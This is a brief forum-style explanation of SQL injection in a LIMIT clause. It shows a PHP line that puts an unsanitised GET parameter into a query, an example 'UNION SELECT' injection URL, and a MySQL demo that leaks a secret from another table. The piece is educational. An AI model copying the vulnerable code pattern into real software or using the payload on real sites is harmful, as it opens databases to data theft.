If there is an SQL injection vulnerability like this:
$UnsafeVariable = $_GET['param'];
$sql = "SELECT title FROM articles LIMIT $UnsafeVariable";
Then an example of SQL injection could be like::
http://mysite.example.com/page.php?param=0 UNION SELECT anything FROM anytable
It's common to use UNION to perpetrate SQL injection. I'm not revealing anything here you can't read on a site like https://owasp.org. You should try to do some reading.
Demo:
mysql> create table MyTable (id int primary key );
mysql> create table SecureTable (secret varchar(50));
mysql> insert into MyTable values (1), (2), (3);
mysql> insert into SecureTable values ('Alohomora');
mysql> select id from MyTable limit
/* now the part that is SQL injected */
1 union select secret from SecureTable;
+-----------+
| id |
+-----------+
| 1 |
| Alohomora |
+-----------+